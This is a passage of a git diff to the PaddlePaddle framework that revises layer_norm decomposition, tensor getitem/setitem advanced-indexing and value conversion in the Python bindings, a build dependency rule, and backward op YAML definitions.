+static std::vector<int64_t> empty_shape;
+
 template <typename T>
 Tensor mean_decomp(const Tensor& x, const IntArray& axis, bool keepdim) {
   auto org_dtype = x.dtype();
@@ -345,62 +348,66 @@ std::tuple<Tensor, Tensor, Tensor> layer_norm_decomp(
 
   // cast dtype to float32 if dtype =float16 or bfloat16
   if (need_cast) {
-    x_cast = cast<T>(x_cast, phi::DataType::FLOAT32);
+    x_cast = cast<T>(x_cast, DataType::FLOAT32);
   }
 
   auto x_dim = common::vectorize<int64_t>(x.dims());
   for (size_t i = begin_norm_axis; i < x_dim.size(); i++) {
     axis.push_back(static_cast<int64_t>(i));
   }
-  auto mean_ = mean_decomp<T>(x_cast, IntArray(axis), true);
+  auto mean_ = mean_decomp<T>(x_cast, axis, true);
   auto difference = x_cast - mean_;
   auto var_tmp1 = difference * difference;
-  auto variance = mean_decomp<T>(var_tmp1, IntArray(axis), true);
+  auto variance = mean_decomp<T>(var_tmp1, axis, true);
   auto var_tmp3 = variance + epsilon;
   auto rsqrt_var = elementwise_pow<T>(
-      var_tmp3,
-      full<T>(common::vectorize(var_tmp3.dims()), -0.5, var_tmp3.dtype()));
+      var_tmp3, full<T>(empty_shape, -0.5, var_tmp3.dtype()));
   auto out = difference * rsqrt_var;
 
   auto scale_ptr = scale.get_ptr();
   auto bias_ptr = bias.get_ptr();
 
-  std::vector<int64_t> slice_shape;
-  for (int64_t i = begin_norm_axis; i < static_cast<int64_t>(x_dim.size());
-       i++) {
-    slice_shape.push_back(x_dim[i]);
+  std::vector<int64_t> slice_shape_l;
+  std::vector<int64_t> slice_shape_r;
+  for (int64_t i = 0; i < static_cast<int64_t>(x_dim.size()); i++) {
+    if (i < begin_norm_axis) {
+      slice_shape_l.push_back(x_dim[i]);
+    } else {
+      slice_shape_r.push_back(x_dim[i]);
+    }
   }
   Tensor scale_cast;
   if (scale_ptr) {
-    if (slice_shape != scale_ptr->shape()) {
-      scale_cast = reshape<T>(*scale_ptr, slice_shape);
+    if (slice_shape_r != scale_ptr->shape()) {
+      scale_cast = reshape<T>(*scale_ptr, slice_shape_r);
     } else {
       scale_cast = *scale_ptr;
     }
     if (need_cast) {
-      scale_cast = cast<T>(scale_cast, phi::DataType::FLOAT32);
+      scale_cast = cast<T>(scale_cast, DataType::FLOAT32);
     }
     out = out * scale_cast;
   }
   Tensor bias_cast;
   if (bias_ptr) {
-    if (slice_shape != bias_ptr->shape()) {
-      bias_cast = reshape<T>(*bias_ptr, slice_shape);
+    if (slice_shape_r != bias_ptr->shape()) {
+      bias_cast = reshape<T>(*bias_ptr, slice_shape_r);
     } else {
       bias_cast = *bias_ptr;
     }
     if (need_cast) {
-      bias_cast = cast<T>(bias_cast, phi::DataType::FLOAT32);
+      bias_cast = cast<T>(bias_cast, DataType::FLOAT32);
     }
     out = out + bias_cast;
   }
-  mean_ = reshape<T>(mean_, std::vector<int64_t>({-1}));
-  variance = reshape<T>(variance, std::vector<int64_t>({-1}));
+  mean_ = reshape<T>(mean_, slice_shape_l);
+  variance = reshape<T>(variance, slice_shape_l);
 
+  // same as LayerNormInferMeta
+  // x: float32 --> out: float32, mean: float32, variance: float32
+  // x: float16 --> out: float16, mean: float32, variance: float32
   if (need_cast) {
     out = cast<T>(out, org_dtype);
-    mean_ = cast<T>(mean_, org_dtype);
-    variance = cast<T>(variance, org_dtype);
   }
 
   return std::make_tuple(out, mean_, variance);
diff --git a/paddle/fluid/pybind/CMakeLists.txt b/paddle/fluid/pybind/CMakeLists.txt
index 5306d282e797ca..8a70396bddee6e 100755
--- a/paddle/fluid/pybind/CMakeLists.txt
+++ b/paddle/fluid/pybind/CMakeLists.txt
@@ -287,7 +287,7 @@ if(WITH_PYTHON)
                  eager_legacy_op_function_generator.cc)
   set(GENERATOR_DEPS ${PYBIND_DEPS})
   list(REMOVE_DUPLICATES GENERATOR_DEPS)
-  if(NOT WITH_ARM)
+  if(WIN32)
     list(REMOVE_ITEM GENERATOR_DEPS python)
   endif()
   target_link_libraries(eager_legacy_op_function_generator ${GENERATOR_DEPS})
diff --git a/paddle/fluid/pybind/eager_method.cc b/paddle/fluid/pybind/eager_method.cc
index 48a8fdc8daa700..617ed37f6fd816 100644
--- a/paddle/fluid/pybind/eager_method.cc
+++ b/paddle/fluid/pybind/eager_method.cc
@@ -54,6 +54,7 @@ typedef SSIZE_T ssize_t;
 #pragma GCC diagnostic ignored "-Wmissing-field-initializers"
 #include "paddle/common/ddim.h"
 #include "paddle/fluid/eager/amp_utils.h"
+#include "paddle/fluid/eager/api/generated/eager_generated/backwards/nodes.h"
 #include "paddle/fluid/eager/api/generated/eager_generated/forwards/dygraph_functions.h"
 #include "paddle/fluid/eager/eager_amp_auto_cast.h"
 #include "paddle/fluid/framework/python_headers.h"
@@ -1361,6 +1362,7 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self,
              &use_strided_slice);
 
   // step2: Dealing with basic indexing
+  bool out_is_view = false;
   auto out = getTensorWithBasicIndexing(tensor,
                                         &slice_axes,
                                         &slice_starts,
@@ -1369,7 +1371,8 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self,
                                         &decrease_axis,
                                         &none_axes,
                                         &infer_flags,
-                                        &use_strided_slice);
+                                        &use_strided_slice,
+                                        &out_is_view);
 
   if (!has_advanced_index) {
     return ToPyObject(out);
@@ -1377,7 +1380,7 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self,
 
   // step3: Dealing with advanced indexing
   std::vector<paddle::Tensor> transed_index;
-  std::vector<int> trans_back_dim;
+  std::vector<int> trans_back_dim, trans_dim;
   int pos_of_new_dim = INT_MAX, rank_of_new_dim = 1;
 
   paddle::Tensor transed_tensor = dealWithAdvancedIndex(out,
@@ -1387,7 +1390,9 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self,
                                                         &transed_index,
                                                         &trans_back_dim,
                                                         &pos_of_new_dim,
-                                                        &rank_of_new_dim);
+                                                        &rank_of_new_dim,
+                                                        &trans_dim,
+                                                        &out_is_view);
 
   if (transed_index.size() == 1 &&
       transed_index[0].dtype() == phi::DataType::BOOL) {
@@ -1417,14 +1422,14 @@ static PyObject* tensor__getitem_dygraph(TensorObject* self,
 
   if (pos_of_new_dim != 0) {
     std::vector<int> perm(out.shape().size(), 0);
-    int tmp1 = pos_of_new_dim, tmp2 = 0,
+    int tmp1 = rank_of_new_dim, tmp2 = 0,
         tmp3 = pos_of_new_dim + rank_of_new_dim;
     for (int i = 0; i < static_cast<int>(out.shape().size()); ++i) {
-      if (i < rank_of_new_dim) {
+      if (i < pos_of_new_dim) {
         perm[i] =
-            tmp1++;  // range(pos_of_new_dim, pos_of_new_dim + rank_of_new_dim)
-      } else if (i >= rank_of_new_dim && i < pos_of_new_dim + rank_of_new_dim) {
-        perm[i] = tmp2++;  // range(0, pos_of_new_dim)
+            tmp1++;  // range(rank_of_new_dim, pos_of_new_dim + rank_of_new_dim)
+      } else if (i >= pos_of_new_dim && i < pos_of_new_dim + rank_of_new_dim) {
+        perm[i] = tmp2++;  // range(0, rank_of_new_dim)
       } else {
         perm[i] = tmp3++;  // range(pos_of_new_dim + rank_of_new_dim, out.ndim)
       }
@@ -1609,12 +1614,9 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self,
              &use_strided_slice);
 
   // step2: Parse values
-  PADDLE_ENFORCE(
-      PyCheckTensor(value_obj),
-      platform::errors::InvalidArgument("The value must be a Tensor"));
-
+  std::vector<phi::Scalar> values;
   paddle::Tensor value_tensor =
-      reinterpret_cast<TensorObject*>(value_obj)->tensor;
+      dealWithValues(tensor, value_obj, &values, has_advanced_index);
 
   if (!has_advanced_index) {
     // use set_value OP if there is no advanced index
@@ -1622,45 +1624,60 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self,
     // Release gil and do tracing
     py::gil_scoped_release release;
     // use inplace set_value_ operator
-    if (value_tensor.initialized() &&
-        (self->tensor.dtype() != value_tensor.dtype())) {
-      if (egr::Controller::Instance().GetAMPLevel() !=
-          paddle::imperative::AmpLevel::O0) {
-        paddle::small_vector<std::vector<paddle::Tensor>,
-                             egr::kSlotSmallVectorSize>
-            tmps = {{self->tensor}, {value_tensor}};
-        auto amp_dtype = egr::GetAmpDestDtype("set_value", tmps);
-        self->tensor = egr::EagerAmpAutoCast(
-            self->tensor.name(), self->tensor, amp_dtype, "set_value");
-        value_tensor = egr::EagerAmpAutoCast(
-            value_tensor.name(), value_tensor, amp_dtype, "set_value");
-      }
+    if (value_tensor.initialized()) {
       if (self->tensor.dtype() != value_tensor.dtype()) {
-        value_tensor = cast_ad_func(value_tensor, self->tensor.dtype());
+        if (egr::Controller::Instance().GetAMPLevel() !=
+            paddle::imperative::AmpLevel::O0) {
+          paddle::small_vector<std::vector<paddle::Tensor>,
+                               egr::kSlotSmallVectorSize>
+              tmps = {{self->tensor}, {value_tensor}};
+          auto amp_dtype = egr::GetAmpDestDtype("set_value", tmps);
+          self->tensor = egr::EagerAmpAutoCast(
+              self->tensor.name(), self->tensor, amp_dtype, "set_value");
+          value_tensor = egr::EagerAmpAutoCast(
+              value_tensor.name(), value_tensor, amp_dtype, "set_value");
+        }
+        if (self->tensor.dtype() != value_tensor.dtype()) {
+          value_tensor = cast_ad_func(value_tensor, self->tensor.dtype());
+        }
       }
-    }
 
-    // step3.1: Only basic indexing, use OP set_value.
-    const phi::distributed::ProcessMesh* mesh = nullptr;
-    if (InputsContainDistTensor(&mesh, self->tensor, value_tensor)) {
-      ConvertAllInputsToDistTensor(mesh, self->tensor, value_tensor);
-    }
-    self->tensor = set_value_with_tensor__ad_func(self->tensor,
-                                                  value_tensor,
-                                                  slice_starts,
-                                                  slice_ends,
-                                                  slice_strides,
-                                                  slice_axes,
-                                                  decrease_axis,
-                                                  none_axes);
-    if (PyCheckTensor(value_obj)) {
-      // pass the stop_gradient from value to tensor.
-      // pass stop gradient should be done after CheckInplace in
-      // set_value__dygraph_function.
-      if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() &&
-          egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) {
-        egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false);
+      // step3.1: Only basic indexing, use OP set_value.
+      const phi::distributed::ProcessMesh* mesh = nullptr;
+      if (InputsContainDistTensor(&mesh, self->tensor, value_tensor)) {
+        ConvertAllInputsToDistTensor(mesh, self->tensor, value_tensor);
       }
+      self->tensor = set_value_with_tensor__ad_func(self->tensor,
+                                                    value_tensor,
+                                                    slice_starts,
+                                                    slice_ends,
+                                                    slice_strides,
+                                                    slice_axes,
+                                                    decrease_axis,
+                                                    none_axes);
+      if (PyCheckTensor(value_obj)) {
+        // pass the stop_gradient from value to tensor.
+        // pass stop gradient should be done after CheckInplace in
+        // set_value__dygraph_function.
+        if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() &&
+            egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) {
+          egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false);
+        }
+      }
+    } else {
+      const phi::distributed::ProcessMesh* mesh = nullptr;
+      if (InputsContainDistTensor(&mesh, self->tensor)) {
+        ConvertAllInputsToDistTensor(mesh, self->tensor);
+      }
+      self->tensor = set_value__ad_func(self->tensor,
+                                        slice_starts,
+                                        slice_ends,
+                                        slice_strides,
+                                        slice_axes,
+                                        decrease_axis,
+                                        none_axes,
+                                        {1},
+                                        values);
     }
   } else {
     // step3.2: Case for there are advanced indexing.
@@ -1670,6 +1687,7 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self,
     //   3. assign values to the sliced result by index_put OP;
     //   4. transpose back and assign the result to original tensor by set_value
     //   OP.
+    bool out_is_view = false;
     paddle::Tensor sub_tensor = getTensorWithBasicIndexing(tensor,
                                                            &slice_axes,
                                                            &slice_starts,
@@ -1678,12 +1696,13 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self,
                                                            &decrease_axis,
                                                            &none_axes,
                                                            &infer_flags,
-                                                           &use_strided_slice);
+                                                           &use_strided_slice,
+                                                           &out_is_view);
 
     std::vector<paddle::Tensor> transed_index;
-    std::vector<int> trans_back_dim;
+    std::vector<int> trans_back_dim, trans_dim;
 
-    int pos_of_new_dim = 0, rank_of_new_dim = 0;
+    int pos_of_new_dim = INT_MAX, rank_of_new_dim = 1;
 
     paddle::Tensor transed_sub_tensor =
         dealWithAdvancedIndex(sub_tensor,
@@ -1693,61 +1712,127 @@ static PyObject* tensor__setitem_dygraph(TensorObject* self,
                               &transed_index,
                               &trans_back_dim,
                               &pos_of_new_dim,
-                              &rank_of_new_dim);
+                              &rank_of_new_dim,
+                              &trans_dim,
+                              &out_is_view);
 
     // Release gil and do tracing
     py::gil_scoped_release release;
-
-    if (value_tensor.initialized() &&
-        (self->tensor.dtype() != value_tensor.dtype())) {
-      if (egr::Controller::Instance().GetAMPLevel() !=
-          paddle::imperative::AmpLevel::O0) {
-        paddle::small_vector<std::vector<paddle::Tensor>,
-                             egr::kSlotSmallVectorSize>
-            tmps = {{self->tensor}, {value_tensor}};
-        auto amp_dtype = egr::GetAmpDestDtype("index_put", tmps);
-        self->tensor = egr::EagerAmpAutoCast(
-            self->tensor.name(), self->tensor, amp_dtype, "index_put");
-        value_tensor = egr::EagerAmpAutoCast(
-            value_tensor.name(), value_tensor, amp_dtype, "index_put");
-      }
+    if (value_tensor.initialized()) {
       if (self->tensor.dtype() != value_tensor.dtype()) {
-        value_tensor = cast_ad_func(value_tensor, self->tensor.dtype());
+        if (egr::Controller::Instance().GetAMPLevel() !=
+            paddle::imperative::AmpLevel::O0) {
+          paddle::small_vector<std::vector<paddle::Tensor>,
+                               egr::kSlotSmallVectorSize>
+              tmps = {{self->tensor}, {value_tensor}};
+          auto amp_dtype = egr::GetAmpDestDtype("index_put", tmps);
+          self->tensor = egr::EagerAmpAutoCast(
+              self->tensor.name(), self->tensor, amp_dtype, "index_put");
+          value_tensor = egr::EagerAmpAutoCast(
+              value_tensor.name(), value_tensor, amp_dtype, "index_put");
+        }
+        if (self->tensor.dtype() != value_tensor.dtype()) {
+          value_tensor = cast_ad_func(value_tensor, self->tensor.dtype());
+        }
       }
-    }
 
-    // TODO(zoooo0820) 1.Using inplace version index_put
-    //                  2.Remove following code after backward bug fixed.
-    transed_sub_tensor = assign_ad_func(transed_sub_tensor);
+      if (value_tensor.dims().size() > 1 && pos_of_new_dim != 0) {
+        value_tensor = transpose_ad_func(value_tensor, trans_dim);
+      }
 
-    const phi::distributed::ProcessMesh* mesh = nullptr;
-    if (InputsContainDistTensor(
-            &mesh, self->tensor, transed_sub_tensor, value_tensor)) {
-      ConvertAllInputsToDistTensor(
-          mesh, self->tensor, transed_sub_tensor, value_tensor);
-    }
+      const phi::distributed::ProcessMesh* mesh = nullptr;
+      if (InputsContainDistTensor(
+              &mesh, self->tensor, transed_sub_tensor, value_tensor)) {
+        ConvertAllInputsToDistTensor(
+            mesh, self->tensor, transed_sub_tensor, value_tensor);
+      }
 
-    transed_sub_tensor =
-        index_put_ad_func(transed_sub_tensor, transed_index, value_tensor);
-
-    paddle::Tensor transback_sub_tensor =
-        transpose_ad_func(transed_sub_tensor, trans_back_dim);
-
-    self->tensor = set_value_with_tensor__ad_func(self->tensor,
-                                                  transback_sub_tensor,
-                                                  slice_starts,
-                                                  slice_ends,
-                                                  slice_strides,
-                                                  slice_axes,
-                                                  decrease_axis,
-                                                  none_axes);
-    if (PyCheckTensor(value_obj)) {
-      // pass the stop_gradient from value to tensor.
-      // pass stop gradient should be done after CheckInplace in
-      // set_value__dygraph_function.
-      if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() &&
-          egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) {
-        egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false);
+      if (transed_index.size() == 1 &&
+          transed_index[0].dtype() == phi::DataType::BOOL &&
+          transed_index[0].shape().size() == self->tensor.shape().size()) {
+        if (value_tensor.shape() != self->tensor.shape()) {
+          value_tensor = expand_ad_func(value_tensor, self->tensor.shape());
+        }
+        transed_sub_tensor =
+            where__ad_func(logical_not_ad_func(transed_index[0]),
+                           transed_sub_tensor,
+                           value_tensor);
+      } else {
+        transed_sub_tensor =
+            index_put__ad_func(transed_sub_tensor, transed_index, value_tensor);
+      }
+
+      if (out_is_view) {
+        // NOTE(zoooo0820): if out_is_view is true, it is a case of
+        // combined-indexing setitem, i.e. firstly we get a view of
+        // self->tensor, then modified it with inplace api index_put_ For now,
+        // in design of Paddle, the forward result is right. But the backward
+        // edge can not be established because the Base Tensor cannot sense
+        // whether it has been modified by other operations. Following codes are
+        // to add a new node (set_value_with_tensor_grad) to record the backward
+        // edge, with out ad_function which needs to do the forward calculation.
+
+        egr::AutogradMeta* x_autograd_meta =
+            egr::EagerUtils::nullable_autograd_meta(self->tensor);
+        egr::AutogradMeta* values_autograd_meta =
+            egr::EagerUtils::nullable_autograd_meta(transed_sub_tensor);
+        bool trace_backward = egr::Controller::Instance().HasGrad();
+        bool require_any_grad = egr::EagerUtils::ComputeRequireGrad(
+            trace_backward, x_autograd_meta, values_autograd_meta);
+        // Node Declaration
+        std::shared_ptr<SetValueWithTensorGradNode> grad_node;
+        // Set grad_node before API Call
+        if (require_any_grad) {
+          paddle::Tensor transback_sub_tensor =
+              transpose_ad_func(transed_sub_tensor, trans_back_dim);
+          const auto& values_tmp =
+              (require_any_grad && transback_sub_tensor.is_dense_tensor() &&
+               !std::dynamic_pointer_cast<phi::DenseTensor>(
+                    transback_sub_tensor.impl())
+                    ->meta()
+                    .is_contiguous())
+                  ? paddle::Tensor(
+                        std::make_shared<phi::DenseTensor>(
+                            std::move(paddle::experimental::Trans2Contiguous(
+                                *(std::dynamic_pointer_cast<phi::DenseTensor>(
+                                    transback_sub_tensor.impl()))))),
+                        transback_sub_tensor.mutable_autograd_meta())
+                  : transback_sub_tensor;
+
+          grad_node = std::shared_ptr<SetValueWithTensorGradNode>(
+              new SetValueWithTensorGradNode(1, 2));  // NOLINT
+          grad_node->SetAttributestarts(slice_starts);
+          grad_node->SetAttributeends(slice_ends);
+          grad_node->SetAttributesteps(slice_strides);
+          grad_node->SetAttributeaxes(slice_axes);
+          grad_node->SetAttributedecrease_axes(decrease_axis);
+          grad_node->SetAttributenone_axes(none_axes);
+          grad_node->SetTensorWrappervalues(values_tmp);
+
+          paddle::memory::LogDeviceMemoryStats(
+              egr::Controller::Instance().GetExpectedPlace(),
+              "set_value_with_tensor");
+          egr::EagerUtils::CheckInplace(
+              self->tensor, x_autograd_meta, require_any_grad);
+          egr::EagerUtils::PassStopGradient(false, x_autograd_meta);
+          // SetGradOutMeta & SetEdges
+          grad_node->SetGradOutMeta(self->tensor, 0);
+          grad_node->SetGradOutMeta(transback_sub_tensor, 1);
+          if (x_autograd_meta) {
+            egr::EagerUtils::SetOutRankWithSlot(x_autograd_meta, 0);
+            egr::EagerUtils::SetHistory(x_autograd_meta, grad_node);
+          }
+          grad_node->SetGradInMeta(self->tensor, 0);
+        }
+      }
+      if (PyCheckTensor(value_obj)) {
+        // pass the stop_gradient from value to tensor.
+        // pass stop gradient should be done after CheckInplace in
+        // set_value__dygraph_function.
+        if (!egr::EagerUtils::autograd_meta(&value_tensor)->StopGradient() &&
+            egr::EagerUtils::autograd_meta(&self->tensor)->StopGradient()) {
+          egr::EagerUtils::autograd_meta(&self->tensor)->SetStopGradient(false);
+        }
       }
     }
   }
diff --git a/paddle/fluid/pybind/inference_api.cc b/paddle/fluid/pybind/inference_api.cc
index 1db2ab7f871c69..20e644c11919ff 100644
--- a/paddle/fluid/pybind/inference_api.cc
+++ b/paddle/fluid/pybind/inference_api.cc
@@ -800,7 +800,7 @@ void BindAnalysisConfig(py::module *m) {
            &AnalysisConfig::EnableXpu,
            py::arg("l3_size") = 16 * 1024 * 1024,
            py::arg("l3_locked") = false,
-           py::arg("conv_autotune") = true,
+           py::arg("conv_autotune") = false,
            py::arg("conv_autotune_file") = "",
            py::arg("transformer_encoder_precision") = "int16",
            py::arg("transformer_encoder_adaptive_seqlen") = false,
diff --git a/paddle/fluid/pybind/slice_utils.h b/paddle/fluid/pybind/slice_utils.h
index 918d2eeae4272a..919a3a4650d3e7 100644
--- a/paddle/fluid/pybind/slice_utils.h
+++ b/paddle/fluid/pybind/slice_utils.h
@@ -26,9 +26,11 @@
 #include "paddle/fluid/framework/convert_utils.h"
 #include "paddle/fluid/framework/scope_guard.h"
 #include "paddle/fluid/operators/utils.h"
+#include "paddle/fluid/pybind/tensor_py.h"
 #include "paddle/phi/common/data_type.h"
 #include "paddle/phi/core/compat/convert_utils.h"
 #include "paddle/phi/core/dense_tensor.h"
+#include "pybind11/numpy.h"
 #include "pybind11/pybind11.h"
 #include "pybind11/stl.h"
 
@@ -345,11 +347,13 @@ static paddle::Tensor getTensorWithBasicIndexing(
     std::vector<int64_t>* decrease_axis,
     std::vector<int64_t>* none_axes,
     std::vector<int64_t>* infer_flags,
-    bool* use_strided_slice) {
+    bool* use_strided_slice,
+    bool* out_is_view) {
   paddle::Tensor out;
   if (slice_axes->empty()) {
     out = tensor;
   } else {
+    *out_is_view = true;
     if (!(*use_strided_slice)) {
       eager_gil_scoped_release guard;
       out = slice_ad_func(tensor,
@@ -370,6 +374,7 @@ static paddle::Tensor getTensorWithBasicIndexing(
     }
   }
   if (!none_axes->empty()) {
+    *out_is_view = true;
     eager_gil_scoped_release guard;
     // Deal with cases that decrease_axes is not empty
     // For example:
@@ -397,9 +402,9 @@ static paddle::Tensor dealWithAdvancedIndex(
     std::vector<paddle::Tensor>* transed_index,
     std::vector<int>* trans_back_dim,
     int* pos_of_new_dim,
-    int* rank_of_new_dim) {
-  std::vector<int> trans_dim;
-
+    int* rank_of_new_dim,
+    std::vector<int>* trans_dim,
+    bool* out_is_view) {
   int p = 0;
   for (size_t i = 0; i < advanced_index_dim->size(); ++i) {
     auto index_dim = (*advanced_index_dim)[i];
@@ -408,30 +413,28 @@ static paddle::Tensor dealWithAdvancedIndex(
       // advanced_index_dim
       auto index = (*advanced_index)[p++];
 
-      if (!is_for_setitem) {
-        if (index_dim == 0) {
-          // case 1: advanced indices at axis 0, the new dim will be at first.
-          *pos_of_new_dim = 0;
-        } else if (index_dim > 0 && trans_dim.size() > 0 &&
-                   trans_dim[trans_dim.size() - 1] != index_dim - 1) {
-          // case 2: there are not adjacent advanced indices, the new dim will
-          // be at first.
-          *pos_of_new_dim = 0;
-        } else {
-          *pos_of_new_dim = std::min(index_dim, *pos_of_new_dim);
-        }
-        *rank_of_new_dim =
-            std::max(*rank_of_new_dim, static_cast<int>(index.shape().size()));
+      if (index_dim == 0) {
+        // case 1: advanced indices at axis 0, the new dim will be at first.
+        *pos_of_new_dim = 0;
+      } else if (index_dim > 0 && trans_dim->size() > 0 &&
+                 (*trans_dim)[trans_dim->size() - 1] != index_dim - 1) {
+        // case 2: there are not adjacent advanced indices, the new dim will
+        // be at first.
+        *pos_of_new_dim = 0;
+      } else {
+        *pos_of_new_dim = std::min(index_dim, *pos_of_new_dim);
       }
+      *rank_of_new_dim =
+          std::max(*rank_of_new_dim, static_cast<int>(index.shape().size()));
 
-      trans_dim.push_back(index_dim);
+      trans_dim->push_back(index_dim);
       transed_index->push_back(std::move(index));
     }
   }
 
   for (size_t i = 0; i < tensor.shape().size(); ++i) {
     if ((*advanced_index_dim)[i] == -1) {
-      trans_dim.push_back(i);
+      trans_dim->push_back(i);
     }
   }
 
@@ -441,19 +444,20 @@ static paddle::Tensor dealWithAdvancedIndex(
   std::vector<int> original_dim_order(tensor.shape().size());
   std::iota(original_dim_order.begin(), original_dim_order.end(), 0);
 
-  if (original_dim_order == trans_dim) {
+  if (original_dim_order == *trans_dim) {
     transed_tensor = tensor;
   } else {
-    transed_tensor = transpose_ad_func(tensor, trans_dim);
+    *out_is_view = true;
+    transed_tensor = transpose_ad_func(tensor, *trans_dim);
   }
 
   if (is_for_setitem) {
-    trans_back_dim->resize(trans_dim.size());
+    trans_back_dim->resize(trans_dim->size());
     std::iota(trans_back_dim->begin(), trans_back_dim->end(), 0);
     std::sort(trans_back_dim->begin(),
               trans_back_dim->end(),
               [&trans_dim](int left, int right) {
-                return trans_dim[left] < trans_dim[right];
+                return (*trans_dim)[left] < (*trans_dim)[right];
               });
   }
   return transed_tensor;
@@ -511,5 +515,104 @@ static void ParseBoolAndBroadcastIndices(
   }
 }
 
+static paddle::Tensor dealWithValues(const paddle::Tensor& tensor,
+                                     PyObject* value_obj,
+                                     std::vector<phi::Scalar>* values,
+                                     const bool trans_to_tensor) {
+  paddle::Tensor value_tensor;
+  if (PyCheckTensor(value_obj)) {
+    value_tensor = reinterpret_cast<TensorObject*>(value_obj)->tensor;
+  } else if (py::isinstance<py::array>(value_obj)) {
+    paddle::Tensor value_tensor_tmp(
+        std::make_shared<phi::DenseTensor>(),
+        egr::Controller::Instance().GenerateUniqueName());
+    py::object value_obj_tmp(py::handle(value_obj), true);
+    py::object value = value_obj_tmp;
+    if (tensor.dtype() == phi::DataType::FLOAT32) {
+      if (!py::isinstance<py::array_t<float>>(value_obj_tmp)) {
+        value = pybind11::detail::CastNumpyArray<float>(value_obj_tmp);
+      }
+    } else if (tensor.dtype() == phi::DataType::FLOAT64) {
+      if (!py::isinstance<py::array_t<double>>(value_obj_tmp)) {
+        value = pybind11::detail::CastNumpyArray<double>(value_obj_tmp);
+      }
+    } else if (tensor.dtype() == phi::DataType::INT32) {
+      if (!py::isinstance<py::array_t<int32_t>>(value_obj_tmp)) {
+        value = pybind11::detail::CastNumpyArray<int32_t>(value_obj_tmp);
+      }
+    } else if (tensor.dtype() == phi::DataType::INT64) {
+      if (!py::isinstance<py::array_t<int64_t>>(value_obj_tmp)) {
+        value = pybind11::detail::CastNumpyArray<int64_t>(value_obj_tmp);
+      }
+    } else if (tensor.dtype() == phi::DataType::BOOL) {
+      if (!py::isinstance<py::array_t<bool>>(value_obj_tmp)) {
+        value = pybind11::detail::CastNumpyArray<bool>(value_obj_tmp);
+      }
+    } else if (tensor.dtype() == phi::DataType::COMPLEX64) {
+      if (!py::isinstance<py::array_t<std::complex<float>>>(value_obj_tmp)) {
+        value = pybind11::detail::CastNumpyArray<std::complex<float>>(
+            value_obj_tmp);
+      }
+    } else if (tensor.dtype() == phi::DataType::COMPLEX128) {
+      if (!py::isinstance<py::array_t<std::complex<double>>>(value_obj_tmp)) {
+        value = pybind11::detail::CastNumpyArray<std::complex<double>>(
+            value_obj_tmp);
+      }
+    } else {
+      PADDLE_THROW(platform::errors::InvalidArgument(
+          "When assign a numpy.np value to a paddle.Tensor, "
+          "the data type of the paddle.Tensor must be bool, "
+          "float32, float64, complex64, complex128, int32 or int64, "
+          "please check the type of tensor."));
+    }
+    SetTensorFromPyArray(
+        static_cast<phi::DenseTensor*>(value_tensor_tmp.impl().get()),
+        value,
+        tensor.place(),
+        false);
+    value_tensor = value_tensor_tmp;
+  } else {
+    py::object value_obj_tmp(py::handle(value_obj), true);
+    // convert the value to self data type
+    if (py::isinstance<py::float_>(value_obj_tmp) ||
+        py::isinstance<py::int_>(value_obj_tmp) ||
+        py::isinstance<py::bool_>(value_obj_tmp) ||
+        PyComplex_Check(value_obj)) {
+      if (tensor.dtype() == phi::DataType::FLOAT32 ||
+          tensor.dtype() == phi::DataType::FLOAT16 ||
+          tensor.dtype() == phi::DataType::BFLOAT16) {
+        values->push_back(value_obj_tmp.cast<float>());
+      } else if (tensor.dtype() == phi::DataType::FLOAT64) {
+        values->push_back(value_obj_tmp.cast<double>());
+      } else if (tensor.dtype() == phi::DataType::INT32 ||
+                 tensor.dtype() == phi::DataType::INT16 ||
+                 tensor.dtype() == phi::DataType::INT8 ||
+                 tensor.dtype() == phi::DataType::UINT8) {
+        values->push_back(value_obj_tmp.cast<float>());
+      } else if (tensor.dtype() == phi::DataType::INT64) {
+        values->push_back(value_obj_tmp.cast<double>());
+      } else if (tensor.dtype() == phi::DataType::BOOL) {
+        values->push_back(value_obj_tmp.cast<bool>());
+      } else if (tensor.dtype() == phi::DataType::COMPLEX64) {
+        values->push_back(value_obj_tmp.cast<std::complex<float>>());
+      } else if (tensor.dtype() == phi::DataType::COMPLEX128) {
+        values->push_back(value_obj_tmp.cast<std::complex<double>>());
+      }
+    } else {
+      PADDLE_THROW(platform::errors::InvalidArgument(
+          "Value type error. The assign value allows "
+          "Tensor, numpy.ndarray, integer, float, complex or bool, "
+          "but received %s.",
+          Py_TYPE(value_obj)));
+    }
+
+    if (trans_to_tensor) {
+      value_tensor =
+          full_ad_func({1}, (*values)[0], tensor.dtype(), tensor.place());
+    }
+  }
+  return value_tensor;
+}
+
 }  // namespace pybind
 }  // namespace paddle
diff --git a/paddle/phi/api/yaml/backward.yaml b/paddle/phi/api/yaml/backward.yaml
index 3a87826337465b..81339a24c50de8 100644
--- a/paddle/phi/api/yaml/backward.yaml
+++ b/paddle/phi/api/yaml/backward.yaml
@@ -944,8 +944,6 @@
     func : gather_nd_grad
   composite : gather_nd_grad(x, index, out_grad, x_grad)
   no_need_buffer : x
-  data_transform :
-    skip_transform : index
 
 - backward_op : gaussian_inplace_grad
   forward : gaussian_inplace(Tensor x, float mean=0, float std=1.0, int seed=0) -> Tensor(out)
@@ -1762,8 +1760,8 @@
   optional : boxes_num
 
 - backward_op : put_along_axis_grad
-  forward : put_along_axis (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign") -> Tensor(out)
-  args : (Tensor arr, Tensor indices, Tensor out_grad, int axis, str reduce)
+  forward : put_along_axis (Tensor arr, Tensor indices, Tensor values, int axis, str reduce = "assign", bool include_self = true) -> Tensor(out)
